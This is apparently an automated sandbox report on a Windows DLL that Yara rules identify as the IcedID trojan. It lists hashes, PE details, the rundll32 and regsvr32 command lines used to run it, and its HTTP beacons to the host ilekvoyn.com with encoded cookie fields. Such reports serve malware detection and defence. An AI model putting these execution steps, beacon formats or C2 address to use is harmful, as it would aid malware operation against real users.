              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              64.227.182.2
              ilekvoyn.comCanada
              14061DIGITALOCEAN-ASNUStrue
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:632638
              Start date and time: 23/05/202220:59:232022-05-23 20:59:23 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 31s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:J5V5DR.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:31
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winDLL@13/0@4/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 54.5% (good quality ratio 35.3%)
              • Quality average: 37.8%
              • Quality standard deviation: 35.2%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .dll
              • Adjust boot time
              • Enable AMSI
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 184.30.21.144
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              TimeTypeDescription
              21:00:41API Interceptor1x Sleep call for process: regsvr32.exe modified
              21:00:41API Interceptor2x Sleep call for process: rundll32.exe modified
              21:00:54API Interceptor1x Sleep call for process: loaddll64.exe modified
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
              Entropy (8bit):4.565829607652442
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
              File name:J5V5DR.dll
              File size:718848
              MD5:9b692f43d575acb739decfc809db7f2e
              SHA1:bc42c60590cb908e765e2d97e8b3a92b4616cd30
              SHA256:0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
              SHA512:f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473
              SSDEEP:12288:ls83XIJDjnYSwX+rX8UsV6C7u7v0euPFwdH1hOR6LF9aFpJv7B5pCYUtvRwzoH7n:vHIJLDc+rDCK7v0pFoVhRF9aFfDCFH7p
              TLSH:A1E4BFB875143CD6E66E527BDAD6BDDD13B627638A8BA8CC8064B7C30563371FE02805
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q.R...R...R...o...........\...g...(...D...^...........RichR...........PE..d...fZ.b.........." .....^.........................
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x180000000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x180000000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
              Time Stamp:0x628B5A66 [Mon May 23 09:56:54 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:5fc0865d8cfea72f745977b121a33fe9
              Instruction
              dec ebp
              pop edx
              nop
              add byte ptr [ebx], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x70700xc0.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x72040x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x70500x1c.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x50.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x5cf10x5e00False0.623213098404DOS executable (COM)6.22619936287IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x3440x400False0.4814453125data3.58877198554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x80000xa90e10xa9200False0.557561610772data4.36278743937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              DLLImport
              USER32.dllCreateDialogIndirectParamA, AppendMenuA, CharPrevA, DdeQueryStringA, ChangeDisplaySettingsExA
              GDI32.dllGetCharWidthFloatA, ExtFloodFill, GetGraphicsMode
              NameOrdinalAddress
              DllRegisterServer10x180001054
              HdQZgnE20x180006849
              IfkPmdu30x18000675f
              cJPSzqHBMN40x180006928
              pcufUY50x180006716
              rHqnYSA60x1800068c4
              zlmkoZLQMd70x1800067cd
              TimestampSource PortDest PortSource IPDest IP
              May 23, 2022 21:00:40.544537067 CEST4974080192.168.2.364.227.182.2
              May 23, 2022 21:00:40.633488894 CEST4974180192.168.2.364.227.182.2
              May 23, 2022 21:00:40.720813036 CEST804974064.227.182.2192.168.2.3
              May 23, 2022 21:00:40.720971107 CEST4974080192.168.2.364.227.182.2
              May 23, 2022 21:00:40.724489927 CEST4974080192.168.2.364.227.182.2
              May 23, 2022 21:00:40.809746027 CEST804974164.227.182.2192.168.2.3
              May 23, 2022 21:00:40.809890032 CEST4974180192.168.2.364.227.182.2
              May 23, 2022 21:00:40.812602043 CEST4974180192.168.2.364.227.182.2
              May 23, 2022 21:00:40.873374939 CEST4974380192.168.2.364.227.182.2
              May 23, 2022 21:00:40.900010109 CEST804974064.227.182.2192.168.2.3
              May 23, 2022 21:00:40.988132954 CEST804974164.227.182.2192.168.2.3
              May 23, 2022 21:00:41.046269894 CEST804974364.227.182.2192.168.2.3
              May 23, 2022 21:00:41.046395063 CEST4974380192.168.2.364.227.182.2
              May 23, 2022 21:00:41.046794891 CEST4974380192.168.2.364.227.182.2
              May 23, 2022 21:00:41.219418049 CEST804974364.227.182.2192.168.2.3
              May 23, 2022 21:00:41.517158031 CEST804974064.227.182.2192.168.2.3
              May 23, 2022 21:00:41.604914904 CEST804974164.227.182.2192.168.2.3
              May 23, 2022 21:00:41.764945984 CEST4974080192.168.2.364.227.182.2
              May 23, 2022 21:00:41.784478903 CEST4974180192.168.2.364.227.182.2
              May 23, 2022 21:00:41.832554102 CEST804974364.227.182.2192.168.2.3
              May 23, 2022 21:00:41.940778017 CEST4974380192.168.2.364.227.182.2
              May 23, 2022 21:00:42.421145916 CEST4974080192.168.2.364.227.182.2
              May 23, 2022 21:00:42.641917944 CEST4974180192.168.2.364.227.182.2
              May 23, 2022 21:00:42.863286018 CEST4974380192.168.2.364.227.182.2
              May 23, 2022 21:00:53.574182987 CEST4975080192.168.2.364.227.182.2
              May 23, 2022 21:00:53.743202925 CEST804975064.227.182.2192.168.2.3
              May 23, 2022 21:00:53.743336916 CEST4975080192.168.2.364.227.182.2
              May 23, 2022 21:00:53.743892908 CEST4975080192.168.2.364.227.182.2
              May 23, 2022 21:00:53.911603928 CEST804975064.227.182.2192.168.2.3
              May 23, 2022 21:00:54.528074980 CEST804975064.227.182.2192.168.2.3
              May 23, 2022 21:00:54.645014048 CEST4975080192.168.2.364.227.182.2
              May 23, 2022 21:00:55.435754061 CEST4975080192.168.2.364.227.182.2
              TimestampSource PortDest PortSource IPDest IP
              May 23, 2022 21:00:40.514008999 CEST5592353192.168.2.38.8.8.8
              May 23, 2022 21:00:40.533164978 CEST53559238.8.8.8192.168.2.3
              May 23, 2022 21:00:40.601308107 CEST5772353192.168.2.38.8.8.8
              May 23, 2022 21:00:40.622952938 CEST53577238.8.8.8192.168.2.3
              May 23, 2022 21:00:40.842926025 CEST5811653192.168.2.38.8.8.8
              May 23, 2022 21:00:40.862569094 CEST53581168.8.8.8192.168.2.3
              May 23, 2022 21:00:53.517409086 CEST5742153192.168.2.38.8.8.8
              May 23, 2022 21:00:53.537255049 CEST53574218.8.8.8192.168.2.3
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 23, 2022 21:00:40.514008999 CEST192.168.2.38.8.8.80xca73Standard query (0)ilekvoyn.comA (IP address)IN (0x0001)
              May 23, 2022 21:00:40.601308107 CEST192.168.2.38.8.8.80xdfe7Standard query (0)ilekvoyn.comA (IP address)IN (0x0001)
              May 23, 2022 21:00:40.842926025 CEST192.168.2.38.8.8.80x53e0Standard query (0)ilekvoyn.comA (IP address)IN (0x0001)
              May 23, 2022 21:00:53.517409086 CEST192.168.2.38.8.8.80x204cStandard query (0)ilekvoyn.comA (IP address)IN (0x0001)
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 23, 2022 21:00:40.533164978 CEST8.8.8.8192.168.2.30xca73No error (0)ilekvoyn.com64.227.182.2A (IP address)IN (0x0001)
              May 23, 2022 21:00:40.622952938 CEST8.8.8.8192.168.2.30xdfe7No error (0)ilekvoyn.com64.227.182.2A (IP address)IN (0x0001)
              May 23, 2022 21:00:40.862569094 CEST8.8.8.8192.168.2.30x53e0No error (0)ilekvoyn.com64.227.182.2A (IP address)IN (0x0001)
              May 23, 2022 21:00:53.537255049 CEST8.8.8.8192.168.2.30x204cNo error (0)ilekvoyn.com64.227.182.2A (IP address)IN (0x0001)
              • ilekvoyn.com
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.34974064.227.182.280C:\Windows\System32\regsvr32.exe
              TimestampkBytes transferredDirectionData
              May 23, 2022 21:00:40.724489927 CEST714OUTGET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
              May 23, 2022 21:00:41.517158031 CEST817INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.34974164.227.182.280C:\Windows\System32\regsvr32.exe
              TimestampkBytes transferredDirectionData
              May 23, 2022 21:00:40.812602043 CEST715OUTGET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
              May 23, 2022 21:00:41.604914904 CEST961INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.34974364.227.182.280C:\Windows\System32\regsvr32.exe
              TimestampkBytes transferredDirectionData
              May 23, 2022 21:00:41.046794891 CEST755OUTGET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
              May 23, 2022 21:00:41.832554102 CEST981INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:41 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.34975064.227.182.280C:\Windows\System32\regsvr32.exe
              TimestampkBytes transferredDirectionData
              May 23, 2022 21:00:53.743892908 CEST1125OUTGET / HTTP/1.1
              Connection: Keep-Alive
              Cookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997
              Host: ilekvoyn.com
              May 23, 2022 21:00:54.528074980 CEST1126INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 23 May 2022 19:00:54 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Data Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0


              Click to jump to process

              Target ID:0
              Start time:21:00:34
              Start date:23/05/2022
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"
              Imagebase:0x7ff6f9500000
              File size:140288 bytes
              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:1
              Start time:21:00:34
              Start date:23/05/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Imagebase:0x7ff705dc0000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
              Imagebase:0x7ff6f0b50000
              File size:24064 bytes
              MD5 hash:D78B75FC68247E8A63ACBA846182740E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:3
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:4
              Start time:21:00:35
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:5
              Start time:21:00:39
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:8
              Start time:21:00:43
              Start date:23/05/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
              Imagebase:0x7ff6d8f90000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly